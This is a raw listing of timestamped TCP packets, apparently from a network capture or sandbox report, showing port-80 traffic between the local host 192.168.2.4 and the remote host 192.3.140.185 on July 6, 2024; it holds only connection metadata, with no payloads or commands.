                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.680453062 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.680479050 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.680496931 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.680551052 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725027084 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725039959 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725050926 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725090981 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725179911 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725230932 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725241899 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725277901 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725303888 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725315094 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725323915 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725352049 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725832939 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725843906 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725855112 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725866079 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725878000 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725887060 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725889921 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725902081 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725913048 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725918055 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725924969 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725941896 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725972891 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725975990 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725984097 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.725992918 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726011038 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726018906 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726023912 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726033926 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726046085 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726047039 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726072073 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726321936 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726434946 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726452112 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726484060 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726494074 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726507902 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726511002 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726546049 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726630926 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726644993 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726655960 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726667881 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726681948 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726685047 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726707935 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726828098 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726840019 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726866961 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726939917 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726950884 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726963043 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726985931 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.726998091 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727246046 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727267027 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727278948 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727320910 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727406979 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727418900 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727428913 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727440119 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727458000 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.727472067 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728323936 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728337049 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728346109 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728358030 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728374004 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728384018 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728388071 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728406906 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.728423119 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730036974 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730057001 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730109930 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730110884 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730122089 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730133057 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730150938 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730180025 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.730526924 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.771658897 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.771768093 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.771780968 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.771792889 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.771805048 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.771820068 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.771863937 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.815953016 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.815965891 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.815983057 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.815996885 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.816008091 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.816023111 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.817907095 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.832767010 CEST4974580192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:17.837606907 CEST8049745192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.004398108 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.009378910 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.009458065 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.009499073 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.014329910 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630492926 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630513906 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630523920 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630542994 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630567074 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630604982 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630759001 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630779982 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630841017 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630841970 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630865097 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630916119 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630945921 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.630958080 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.631042957 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.635445118 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.635498047 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.635555983 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.635566950 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.635605097 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719403028 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719415903 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719428062 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719455004 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719540119 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719552994 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719564915 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719584942 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719619036 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719824076 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719922066 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719932079 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719963074 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.719985008 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720001936 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720015049 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720024109 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720124960 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720815897 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720834970 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720846891 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.720885992 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738477945 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738488913 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738501072 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738535881 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738557100 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738559008 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738573074 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738584995 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738611937 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738791943 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738840103 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738851070 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738867998 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.738888025 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808304071 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808316946 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808327913 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808367014 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808470964 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808490038 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808502913 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808531046 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808562040 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808639050 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808696985 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808708906 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.808747053 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809026957 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809039116 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809050083 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809078932 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809109926 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809535027 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809617996 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809628963 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809668064 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809710026 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809721947 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809732914 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809768915 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.809783936 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810417891 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810451984 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810463905 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810494900 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810823917 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810836077 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810848951 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810868979 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.810899019 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.811395884 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.811713934 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.811758995 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.811758995 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.826896906 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.826914072 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.826925039 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.826956034 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.826977015 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827003956 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827014923 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827054024 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827156067 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827426910 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827461004 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827471018 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827512026 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827544928 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827555895 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827565908 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827588081 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827810049 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827857971 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827864885 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827876091 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827914953 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.827939034 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.828049898 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.828061104 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.828087091 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.877451897 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897074938 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897166967 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897222996 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897234917 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897272110 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897303104 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897397041 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897408962 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897420883 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897439957 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897459030 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897469997 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897545099 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897562027 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897588015 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897696018 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897706985 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897718906 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897733927 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897735119 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897752047 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897790909 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.897831917 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898294926 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898351908 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898363113 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898396015 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898479939 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898490906 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898502111 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898514986 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898518085 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898531914 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898596048 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.898701906 CEST4974780192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.899220943 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.899276018 CEST8049747192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:18.899286985 CEST8049747192.3.140.185192.168.2.4
